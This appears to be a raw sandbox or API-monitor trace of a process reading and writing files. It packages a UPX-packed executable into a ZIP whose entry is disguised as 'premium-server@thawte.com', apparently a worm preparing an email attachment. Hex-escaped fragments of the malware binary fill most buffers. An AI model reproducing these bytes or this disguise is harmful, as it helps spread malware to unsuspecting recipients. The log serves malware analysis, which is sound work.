Buffer => \x00\x00\x00 \x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x00\x00\x00\x80\x80\x00\x80\x00\x00\x00\x80\x00\x80\x00\x80\x80\x00\x00\xc0\xc0\xc0\x00\x80\x80\x80\x00\x00\x00\xff\x00\x00\xff\x00\x00\x00\xff\xff\x00\xff\x00\x00\x00\xff\x00\xff\x00\xff\xff\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8f\xff\xff\xff\xff\xff\x00\x00\x88\xff\xff\xff\xff\xf8\x00\x00\x8f\x8f\xff\xff\xff\x8f\x00\x00\x8f\xf8\xff\xff\xf8\xff\x00\x00\x8f\x8f\x88\x88\x8f\x8f\x00\x00\x88\xf7\xf7\xf7\xf7\xf8\x00\x00\x8f\x7f\x7f\x7f\x7f\x7f\x00\x00\x08\xf7\xf7\xf7\xf7\xf0\x00\x00\x00\x8f\x7f\x7f\x7f\x00\x00\x00\x00\x08\xf7\xf7\xf0\x00\x00\x00\x00\x00\x88\x88\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0\x01\x00\x00\xc0 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,748 | 364 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b2}\x99\xfeL\x82m\xf4\xb7p>\x0b\xb4\x02\xdc\xf4^s\x8e\x0b\x98~I\xf4"\xd0\x00\x0b.K\x99\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03\xa0;\xf6
\xe1\xa3O\xc3\xaa-P5\xef3U\xf3\xeb:\x12r\xc0\x13\xfd\xfe\xfe\xf7\xf6\xcb\x0eZFo\x1b\x7f\xe9}t\x91\xfd,\x12\xcd\xe7\x8d?\xe9\xf6\xc8\x0f\xe0l\x8e\xb7\xaeS\xd9I4\x88 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,748 | 364 | NtReadFile |
Buffer => 1O\x12
\x9fu;\xd6rn\x08\x19\xa6r\x9b
\x9fUB
\x9c7\x87\xb2\x97\xc1"\x8d\xc0?\xd7\x8d\xc0<\xaf\xd6\xb8\xec\x91\x8d\xc0?\xc9B^\xa3\x04\x8d\xc0?\xd2I\x98u\x83\xaeX\xa8\xb6\xfaEA\xb0\x91\x0fW%^\x0bU\x12\x91\x0fWEUW\x19\xf3\xfaEaP\x91\x0f]^\xb3\x01`\x9bC\xc8\x00\xf1\\x7f\xf4mH\x0e\xd4\xceW\xbb$e\xe7\x1c\x96\x04W\xbb3\x82\xe7\x15\x06h\x99\xeaZI\xca\x05\x85\x97\xcd\xfe\xb5^b\xe5\xeeKi\xd9;\x91\xcd\xf7\xb6\x06\xa6\xbd\xa5\xb8\xa6\xbd\x8e\xe8\x921e\xcbb*7\xe9\xc6%\x82\xe0}r\x1b"v\x8b\x1f\xaf\xf2H?\xdagO\x9a?m\x99hD\x1c\x9c\xb6O\xe7\x93\x07\x87#\xcbH\xf4\xf8%d\xdb\xf8&\x7f\x90\xec\xa5M\xd7\xf3T\xd8d\xe3\x18$\xbe\xa9v\x92P\xffw\xce\xc7V\xf3\x06W\xa9h?\x9f\xa9\xc0\xd2\x1fV\xeeN\x83V\x83\x02\xa4\xa9\xe9\xb3vPK\x01\x02\x14\x00
\x00\x00 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,748 | 364 | NtReadFile |
Buffer => FileHandle => 0x00000188 |
FAILURE | 3221225489 | |
| 07:44:02,748 | 364 | NtSetInformationFile |
FileHandle => 0x00000188 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:44:02,748 | 364 | NtQueryInformationFile |
FileHandle => 0x00000188 FileInformation => \x00\x80\x00\x00\x00\x00\x00\x00Tq\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:02,748 | 364 | NtWriteFile |
Buffer => PK\x03\x04
\x00\x00\x00\x00\x00\x81\x95\xde0\x90YBOTq\x00\x00Tq\x00\x00\x1d\x00\x00\x00 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,748 | 364 | NtWriteFile |
Buffer => premium-server@thawte.com.zip FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,758 | 364 | NtSetInformationFile |
FileHandle => 0x00000188 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:44:02,758 | 364 | NtReadFile |
Buffer => PK\x03\x04
\x00\x00\x00\x00\x00\x81\x95\xde0+[\xff\xe3\xc0p\x00\x00\xc0p\x00\x00\x19\x00\x00\x00premium-server@thawte.comMZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4 \xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.
$\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,758 | 364 | NtWriteFile |
Buffer => PK\x03\x04
\x00\x00\x00\x00\x00\x81\x95\xde0+[\xff\xe3\xc0p\x00\x00\xc0p\x00\x00\x19\x00\x00\x00premium-server@thawte.comMZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4 \xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.
$\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,758 | 364 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x001.24\x00UPX!\x0c \x02 \x19\xfb\x87H\x91\xa6q\xb5\x12\xc6\x00\x00\xfb\\x00\x00\x00\x9e\x00\x00&\x01\x00w\xff\x87\xa8\x90\x00kernel32.d\xff\x9b\xe7\xdfll5root\IEFrame\x00ATV\xfe\xff\xfcH_Noterctrl_renwnd\x0f\xff\xb7\xff\xff|y_\xee\xcf\xb9\xdd\xdeg;\x84\x15\x80\xd4\x00\x1e8 \xb2\x9f\xfb\x15\x00\x8d\x06\x18x\xb6\xff\xff\xff\x0f@@\x03\x00\x1d+\xf4A\x81O\xcd\xfc\xff\xd7%k\x08\x00\x01@<\x8fS\x016@\xffn\xff\xdfT\xf1\xfd\xa73\xbb\xbd\x9aA\x14\x04W\x85\x0e\x06@]\x10\x00\x18\x04/\xb7\xdb\xdd@\x08\x1f\x00-
\x03y(\x07\xa4,\x8a\xdc\x02\x97\xbf\xfc\xe5\x00\xbe\x0e/\x1b\x00\x00\xbf\x06\xa78\x04\x00\x85/\x05\x13\xb7\xb7\xff\xf2\x01\x00\x15]\x8e_\xce\x0bDe FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,758 | 364 | NtWriteFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x001.24\x00UPX!\x0c \x02 \x19\xfb\x87H\x91\xa6q\xb5\x12\xc6\x00\x00\xfb\\x00\x00\x00\x9e\x00\x00&\x01\x00w\xff\x87\xa8\x90\x00kernel32.d\xff\x9b\xe7\xdfll5root\IEFrame\x00ATV\xfe\xff\xfcH_Noterctrl_renwnd\x0f\xff\xb7\xff\xff|y_\xee\xcf\xb9\xdd\xdeg;\x84\x15\x80\xd4\x00\x1e8 \xb2\x9f\xfb\x15\x00\x8d\x06\x18x\xb6\xff\xff\xff\x0f@@\x03\x00\x1d+\xf4A\x81O\xcd\xfc\xff\xd7%k\x08\x00\x01@<\x8fS\x016@\xffn\xff\xdfT\xf1\xfd\xa73\xbb\xbd\x9aA\x14\x04W\x85\x0e\x06@]\x10\x00\x18\x04/\xb7\xdb\xdd@\x08\x1f\x00-
\x03y(\x07\xa4,\x8a\xdc\x02\x97\xbf\xfc\xe5\x00\xbe\x0e/\x1b\x00\x00\xbf\x06\xa78\x04\x00\x85/\x05\x13\xb7\xb7\xff\xf2\x01\x00\x15]\x8e_\xce\x0bDe FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,758 | 364 | NtReadFile |
Buffer => \x19\x08\xdf\xe8$\xa7/\x8f\x90\xc1\xce\xf2\xd8$\x0c\x07\xc8\xcf\x9e\x1dd\xc0\xb8$g\xb4$o\xac$ '\xdf%
\x1f%|<{\xf2\xecL$\xf7h P\x1do\xd8\x19\xc1V\x89e\xcf\x97\xe0 \xb7\xbf\xf5\xcd\xba\x04{$t|\xf3 $T},{\x0c{M\x07\xadf\xe0|m}\x1c \xf9U\xc4\xe0\xf6`m|\xa4\x02} \x8c\xd8\x02\x0e\x0c\x9d@\xd4|
1\xd6\x1a\x0ci\x18\x1d@ \x8b\x02\x97(.\xd9d \x94\xbc\x83?hm $A+rm b\xedo
\x9aXM){:|,}|\x01m\x83\xdf\x02\xa2t\x14 kTw%\x95h\x1d|\x19|\xda ,\x86_{\xef\xa0\x10t}{.|*)\x00}m\xad\xb5\xdb
\x01{W\x1f'\x88.d6\x13G\xa2<\xd0|f_\x05r\x9fh\xad\xdd\x0cei\x17u\x083s}\xdb]\xbb{i^|Y}\x1f\xdce{-Amm\x9bD{\xd0\x06\x93\x1c{! FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,758 | 364 | NtWriteFile |
Buffer => \x19\x08\xdf\xe8$\xa7/\x8f\x90\xc1\xce\xf2\xd8$\x0c\x07\xc8\xcf\x9e\x1dd\xc0\xb8$g\xb4$o\xac$ '\xdf%
\x1f%|<{\xf2\xecL$\xf7h P\x1do\xd8\x19\xc1V\x89e\xcf\x97\xe0 \xb7\xbf\xf5\xcd\xba\x04{$t|\xf3 $T},{\x0c{M\x07\xadf\xe0|m}\x1c \xf9U\xc4\xe0\xf6`m|\xa4\x02} \x8c\xd8\x02\x0e\x0c\x9d@\xd4|
1\xd6\x1a\x0ci\x18\x1d@ \x8b\x02\x97(.\xd9d \x94\xbc\x83?hm $A+rm b\xedo
\x9aXM){:|,}|\x01m\x83\xdf\x02\xa2t\x14 kTw%\x95h\x1d|\x19|\xda ,\x86_{\xef\xa0\x10t}{.|*)\x00}m\xad\xb5\xdb
\x01{W\x1f'\x88.d6\x13G\xa2<\xd0|f_\x05r\x9fh\xad\xdd\x0cei\x17u\x083s}\xdb]\xbb{i^|Y}\x1f\xdce{-Amm\x9bD{\xd0\x06\x93\x1c{! FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtReadFile |
Buffer => q</>G#\x1c\x0eL\xedwi(t\x0e.\x8d\x00\x05@$F|OZ)\x02
Gf\xe8\x80\xc0\x9a\xdb^\xc2F/\xd8 \xc9-a\xf8N\x15\x90\xe5\x95o\x19\xe2\xb0\x81\xd4\x80l\x14\x85dW\xa9\xd4\xfeL$w{S\x17\xf9\xd2un\xb7] d [\xe5]|\x08i|\xeb\xc2\xbe\xafZ\x96-\x00 \xe4a\xb1\x1c\x07\x0cnrR\x9b\x1e\x98\xc5\\xfb\xda\xa7n\xfbfSm\x82\xb0=C\xac\x1a8P\xdf\xbdt\xb6\x1a\xc1fvMa\xa0c\x14k\x06\xae\xc6 \xb3\x93\xcd\x1e\xce\xf3R\x80g@.\xb7=Zk\x00\xb8\xeb1\k~\x0c\xda\xe3\x89\x0bh\x96\xaa\x89\xb9\x9c\x9b\x14TDFQ\xe2\xedSk1\xbe\xbd{>\x00 MA\xdc\xb6\xe8\xde\xef F{\xe2|\xfbM\x16$f^s}3s\x00 50$\xfb
_`{P\xea5R.\xb8RA5\x1a[\xd7\xd5\x88 D\x00_\xec\x034\xf7\x11U^
\x14|A FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtWriteFile |
Buffer => q</>G#\x1c\x0eL\xedwi(t\x0e.\x8d\x00\x05@$F|OZ)\x02
Gf\xe8\x80\xc0\x9a\xdb^\xc2F/\xd8 \xc9-a\xf8N\x15\x90\xe5\x95o\x19\xe2\xb0\x81\xd4\x80l\x14\x85dW\xa9\xd4\xfeL$w{S\x17\xf9\xd2un\xb7] d [\xe5]|\x08i|\xeb\xc2\xbe\xafZ\x96-\x00 \xe4a\xb1\x1c\x07\x0cnrR\x9b\x1e\x98\xc5\\xfb\xda\xa7n\xfbfSm\x82\xb0=C\xac\x1a8P\xdf\xbdt\xb6\x1a\xc1fvMa\xa0c\x14k\x06\xae\xc6 \xb3\x93\xcd\x1e\xce\xf3R\x80g@.\xb7=Zk\x00\xb8\xeb1\k~\x0c\xda\xe3\x89\x0bh\x96\xaa\x89\xb9\x9c\x9b\x14TDFQ\xe2\xedSk1\xbe\xbd{>\x00 MA\xdc\xb6\xe8\xde\xef F{\xe2|\xfbM\x16$f^s}3s\x00 50$\xfb
_`{P\xea5R.\xb8RA5\x1a[\xd7\xd5\x88 D\x00_\xec\x034\xf7\x11U^
\x14|A FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtReadFile |
Buffer => n
\x9b\xb9vwkz0123456\x86\x1e\x04\xf8789+/\xc7X-Pf\xa9\x956n\x02ty 3o\x0e\xd3\xefc\xc0^\xc9\x15N1l\x1a0#\x1ex\x18nM\xe7\xe8\xd2R\xc1/l1o\xb6Ex\x0b\x94v`
D6.\xa9\xb26+|\xccu\x040\x003IMEO(4\xfb\xd0\xc8U\x89\x80PBy@\xb2\x9d\xa1\x01M\xce\x1e V9\x1d\xae\xb66\x01\x9bCB2-*\x94\xb6\xd6Ty\x94@mX\xd5\xb8m\x0b\x1b\xact/\xf3xG;! b\xed-\xbc\x1d\xee\x11y="N"1\x00\x0f4\xf4k\x05q-V\xcei\x801h\xce\x11kO\x18\xfcC\x07b\xad\x19h\x98j\x8b
1\x17\xd0\xa0a\x06\x85
7\xd6>1\xac\x9f
\x8b=_\x0b\x02>\xceO\xf7.3u\x0448X.\xe3N\xda\x8b\x99kP\x8cs6+\xb0\xf7f'\xbdI?G\xc1\xa9\x02\x94\xbaa\xcd\xff r\xb4V\x18 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtWriteFile |
Buffer => n
\x9b\xb9vwkz0123456\x86\x1e\x04\xf8789+/\xc7X-Pf\xa9\x956n\x02ty 3o\x0e\xd3\xefc\xc0^\xc9\x15N1l\x1a0#\x1ex\x18nM\xe7\xe8\xd2R\xc1/l1o\xb6Ex\x0b\x94v`
D6.\xa9\xb26+|\xccu\x040\x003IMEO(4\xfb\xd0\xc8U\x89\x80PBy@\xb2\x9d\xa1\x01M\xce\x1e V9\x1d\xae\xb66\x01\x9bCB2-*\x94\xb6\xd6Ty\x94@mX\xd5\xb8m\x0b\x1b\xact/\xf3xG;! b\xed-\xbc\x1d\xee\x11y="N"1\x00\x0f4\xf4k\x05q-V\xcei\x801h\xce\x11kO\x18\xfcC\x07b\xad\x19h\x98j\x8b
1\x17\xd0\xa0a\x06\x85
7\xd6>1\xac\x9f
\x8b=_\x0b\x02>\xceO\xf7.3u\x0448X.\xe3N\xda\x8b\x99kP\x8cs6+\xb0\xf7f'\xbdI?G\xc1\xa9\x02\x94\xbaa\xcd\xff r\xb4V\x18 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtReadFile |
Buffer => [F\x0eanvP\x06H\x0fj\x01\xb4\xd9\xdc\xd6\x8e}Xw\x05T-\xb70\xd6v\x1d\x02\xf7\xec^@\xcc\xc1,\x17\xcam\xc1J\xc2W0\xd4\xfd\xc6h\x04\xb9]6t\xcbP\xc8\xf4j\xf5a\x07\xf6v\x97\xcd\xc2f\xf7\xf8.\x8c\xf9\xfax\xfbe\xdfo\x1a
J\x07\x88\x8bE\x08\x8b=\x84\xd8\x8d~v\xe1\x7f@\x83\xc0\x04QP\x89\xb9\xff\xd7\xee\x89]\x089\x85\xf3\xe5\xd6\x02\\xd8\xfeu\x0eh\x18@\xdf\xa6{\x9f\x80\x0cP\x0e\x98|8\x9d!\x0f/\xd6\xcd\xdc\x84\xa9\x9f-&xV\x0cv\xd2\xf0\xfeI\x80<\x08\t\x0e\x19<\x90\x8d\xa3\xa6{v\xd8P+\xd6\x08j 6t(\xd8w\x0b\xdf\x80Ij\x02Sj\x034\x02\x7f\xd39\xd3\x1cp;\xc3t2\x83\xf8\xff|\x92\x1dv\xbaclph\x0cG:&4\x14\x10\x11d\xeb\x10\xdf\xee\xccd%`>u\x0f\xff\xfb\x83}\x08\x02\xb8\xc3\x9a\xe1\x0f\x8c\x19k\xcf u\xfd>\x9a\x91b, FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtWriteFile |
Buffer => [F\x0eanvP\x06H\x0fj\x01\xb4\xd9\xdc\xd6\x8e}Xw\x05T-\xb70\xd6v\x1d\x02\xf7\xec^@\xcc\xc1,\x17\xcam\xc1J\xc2W0\xd4\xfd\xc6h\x04\xb9]6t\xcbP\xc8\xf4j\xf5a\x07\xf6v\x97\xcd\xc2f\xf7\xf8.\x8c\xf9\xfax\xfbe\xdfo\x1a
J\x07\x88\x8bE\x08\x8b=\x84\xd8\x8d~v\xe1\x7f@\x83\xc0\x04QP\x89\xb9\xff\xd7\xee\x89]\x089\x85\xf3\xe5\xd6\x02\\xd8\xfeu\x0eh\x18@\xdf\xa6{\x9f\x80\x0cP\x0e\x98|8\x9d!\x0f/\xd6\xcd\xdc\x84\xa9\x9f-&xV\x0cv\xd2\xf0\xfeI\x80<\x08\t\x0e\x19<\x90\x8d\xa3\xa6{v\xd8P+\xd6\x08j 6t(\xd8w\x0b\xdf\x80Ij\x02Sj\x034\x02\x7f\xd39\xd3\x1cp;\xc3t2\x83\xf8\xff|\x92\x1dv\xbaclph\x0cG:&4\x14\x10\x11d\xeb\x10\xdf\xee\xccd%`>u\x0f\xff\xfb\x83}\x08\x02\xb8\xc3\x9a\xe1\x0f\x8c\x19k\xcf u\xfd>\x9a\x91b, FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtReadFile |
Buffer => \x81\x03FW\x89\xa8\x05YC\xdaR\xfb\xfdBY]\xfc;\xc1u
3u\xd8c\x92l\xdf\xe9-\x06@\xeb\xf6+\x14\x04x]\x83\xe6n\xb0M\x00U\x0cC\x93\xb7\xb6}{c\x84\xc9\x08:\x02\x18AB\xeb\xedP\x01\x02/\xff\xe2\xf1
+\xc17'VW\x8b}\xf6\x89u/\xd0q\xe1\xf8\x80?I\x84H+S\xd6>&\x0f\xcc\xd2\xdd\xdc\x851
\x16\xfcF
##\xeey\xe2\x97\xf3F\x0f\xbe\x04>\xca\x11Y\\xdf\xda\xffo\x0e\x88D\x1d\xdcCF\x83\xfb\x0fr\xe2\x80d
%\xc98M\xdc\xf87\x13\xb7\x89\x7ft\x16\xc6/\x10@\x8d\x0c\x89\x808\xbcs\x05\xde\x1fLJ\xd0\x83\x17O;u\x01F\x19'~7\xde\x8e\xce\x00Tj\x14\xef\x99\xb7\x13M\xb8\xf8\xa2=\xba\x96 ]\x8e\x16\x8b\xdb\xdd\x88\x19\xeb\x16\x10%pD\xb9\xb5\xa5\x08\x90P
\x7f\xb8\x10\xee\x16\\xb7\xff\xdc\xb0\x8bB0\xfc +\xf3Pa\x07\xcf\xda\xae\xf4\xc4;\xf0\xedtQ FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtWriteFile |
Buffer => \x81\x03FW\x89\xa8\x05YC\xdaR\xfb\xfdBY]\xfc;\xc1u
3u\xd8c\x92l\xdf\xe9-\x06@\xeb\xf6+\x14\x04x]\x83\xe6n\xb0M\x00U\x0cC\x93\xb7\xb6}{c\x84\xc9\x08:\x02\x18AB\xeb\xedP\x01\x02/\xff\xe2\xf1
+\xc17'VW\x8b}\xf6\x89u/\xd0q\xe1\xf8\x80?I\x84H+S\xd6>&\x0f\xcc\xd2\xdd\xdc\x851
\x16\xfcF
##\xeey\xe2\x97\xf3F\x0f\xbe\x04>\xca\x11Y\\xdf\xda\xffo\x0e\x88D\x1d\xdcCF\x83\xfb\x0fr\xe2\x80d
%\xc98M\xdc\xf87\x13\xb7\x89\x7ft\x16\xc6/\x10@\x8d\x0c\x89\x808\xbcs\x05\xde\x1fLJ\xd0\x83\x17O;u\x01F\x19'~7\xde\x8e\xce\x00Tj\x14\xef\x99\xb7\x13M\xb8\xf8\xa2=\xba\x96 ]\x8e\x16\x8b\xdb\xdd\x88\x19\xeb\x16\x10%pD\xb9\xb5\xa5\x08\x90P
\x7f\xb8\x10\xee\x16\\xb7\xff\xdc\xb0\x8bB0\xfc +\xf3Pa\x07\xcf\xda\xae\xf4\xc4;\xf0\xedtQ FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtReadFile |
Buffer => \x00`\xf4;\xb6\xd4\xd0\xbeH}k\x81\xfe\xb9\xe1_\xc5\x03U\xf6v+\xfc\x11\x85\xd2tJ\xc8O\x17@ ~\x0b\x8a\x136\xf8\xd2\xff\x88\x0c>F@Ju\xf5\xc6\xc3.F\xeb'\x94\xfc\x8e\xcd\xb1`\xc6\x02\xa5f\x01\xd7\xaf\xfd\x9d\\x85g\xa5%\xff?\x0bT\xf6\x8d\xc6\xbb\x12\x04|\xa6\xeb\x0biv|7\xff.\xa8\x99\xfeJ\xffN\x85\xf6\x7f\xf4\x80$\xf7@^t\x03\xf7\xfa\xc4\xad\xa9\x92\xa7\x1a\xe70P[\xcc\x10\xcex{F\xae\xc8\xf6\xb1u\xe8^\x1b(\x05Z\xe9\xaf\xa0j\x0cX
\xcb#p\xdbxk<\x02\xf4}\x079\xe9\x16+u\xbf\xd8\x85\xa1ESr\x8b\xdeP)&\x85\xc1n\xf0\x8b\xd8Y;\x17Y|\x1fs\x00\xd4m[\xdbF
\x03N\xd6\xc15\xf8\x08\x06n\xb3\x80\xeb(\xf4T\xe0\xeb\x03:\x8b\x0eXp/\xb5\xd2\xc9\x14\x01\xddx\x01\x19\xd8\\x10\xbd\xdc\xee\xa2|\xcd\x12a`\x7f \x8dC
\x1a\x14L\xd7\xde5\x9c\x02I\xde FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtWriteFile |
Buffer => \x00`\xf4;\xb6\xd4\xd0\xbeH}k\x81\xfe\xb9\xe1_\xc5\x03U\xf6v+\xfc\x11\x85\xd2tJ\xc8O\x17@ ~\x0b\x8a\x136\xf8\xd2\xff\x88\x0c>F@Ju\xf5\xc6\xc3.F\xeb'\x94\xfc\x8e\xcd\xb1`\xc6\x02\xa5f\x01\xd7\xaf\xfd\x9d\\x85g\xa5%\xff?\x0bT\xf6\x8d\xc6\xbb\x12\x04|\xa6\xeb\x0biv|7\xff.\xa8\x99\xfeJ\xffN\x85\xf6\x7f\xf4\x80$\xf7@^t\x03\xf7\xfa\xc4\xad\xa9\x92\xa7\x1a\xe70P[\xcc\x10\xcex{F\xae\xc8\xf6\xb1u\xe8^\x1b(\x05Z\xe9\xaf\xa0j\x0cX
\xcb#p\xdbxk<\x02\xf4}\x079\xe9\x16+u\xbf\xd8\x85\xa1ESr\x8b\xdeP)&\x85\xc1n\xf0\x8b\xd8Y;\x17Y|\x1fs\x00\xd4m[\xdbF
\x03N\xd6\xc15\xf8\x08\x06n\xb3\x80\xeb(\xf4T\xe0\xeb\x03:\x8b\x0eXp/\xb5\xd2\xc9\x14\x01\xddx\x01\x19\xd8\\x10\xbd\xdc\xee\xa2|\xcd\x12a`\x7f \x8dC
\x1a\x14L\xd7\xde5\x9c\x02I\xde FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtReadFile |
Buffer => w\x04\xd1Xj5\xeb\xa4BW:\xe4\xc2\x92V\x8ew\xb6\x9d\xae\xe6\x80\x11
\xe8\x93\x15\xa3\xdc\xd6xdL\x11(\x8b@}I\x00\x1b\xd6\xd0\x05\x07\xa3q\x15\xb5\x8dB\x03\x18\xf8\x81\x19-\xfbY\xfd\xd3\x04k\xc0X\x06\xf5\x9b\xfb\x95\xe5d\xe1:\xf9\x83z\xfftb\xd1\xfdv1.1-\x05\xe9 \xef\x8e\x0c\x0b\xa1\x04\xf9\xc3\x8b\xab\xa9mF\x17\xb6\xf8WH\x80\x03\x80\xea\xd0\xae\x85.@2<\xae\xba3Hm\x87tSg\x10^$\x01w\x90\xc1\x0f\x0c3\x8a\x0e\xd6\xf4m\x1c`\x15\xe2\x9dY\x13\x1fl[\xa3c{u\xc5\xbb,\xc0\x1c\x0c\xdb\xe2\x99\xcd0\x08\x1d\x17F27\\xe2\x96\x05u\xe3\xd9\x89\\xd9<<@\xb1\x92\xcb\xdet?(T\x14\xde\x7f\x15\xacwx\x97\x88\x04+CY<\x19\x16\xba\xc1J\xbdo@\x987\x8cTk\x89\xedzO\xf9\x04+\x017 \xdd\x83\x1f\xd8\xebP\xc4+@\x0f\xc2\xce\x16\xb2\x98\x15*\x85\x0b\xdd\x8e\xe4+\x06 FileHandle => 0x00000188 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtWriteFile |
Buffer => w\x04\xd1Xj5\xeb\xa4BW:\xe4\xc2\x92V\x8ew\xb6\x9d\xae\xe6\x80\x11
\xe8\x93\x15\xa3\xdc\xd6xdL\x11(\x8b@}I\x00\x1b\xd6\xd0\x05\x07\xa3q\x15\xb5\x8dB\x03\x18\xf8\x81\x19-\xfbY\xfd\xd3\x04k\xc0X\x06\xf5\x9b\xfb\x95\xe5d\xe1:\xf9\x83z\xfftb\xd1\xfdv1.1-\x05\xe9 \xef\x8e\x0c\x0b\xa1\x04\xf9\xc3\x8b\xab\xa9mF\x17\xb6\xf8WH\x80\x03\x80\xea\xd0\xae\x85.@2<\xae\xba3Hm\x87tSg\x10^$\x01w\x90\xc1\x0f\x0c3\x8a\x0e\xd6\xf4m\x1c`\x15\xe2\x9dY\x13\x1fl[\xa3c{u\xc5\xbb,\xc0\x1c\x0c\xdb\xe2\x99\xcd0\x08\x1d\x17F27\\xe2\x96\x05u\xe3\xd9\x89\\xd9<<@\xb1\x92\xcb\xdet?(T\x14\xde\x7f\x15\xacwx\x97\x88\x04+CY<\x19\x16\xba\xc1J\xbdo@\x987\x8cTk\x89\xedzO\xf9\x04+\x017 \xdd\x83\x1f\xd8\xebP\xc4+@\x0f\xc2\xce\x16\xb2\x98\x15*\x85\x0b\xdd\x8e\xe4+\x06 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,768 | 364 | NtReadFile |
Buffer => \x1fw\x016\xd1='\x7f\x12
\x8d\x8d\xb5\xa5`\xe0\xbe2\xcb\xd5(\xe2\xc1\xa2nG\xec\x8c\xb3\x82\x18b\xf0\x93\x86V
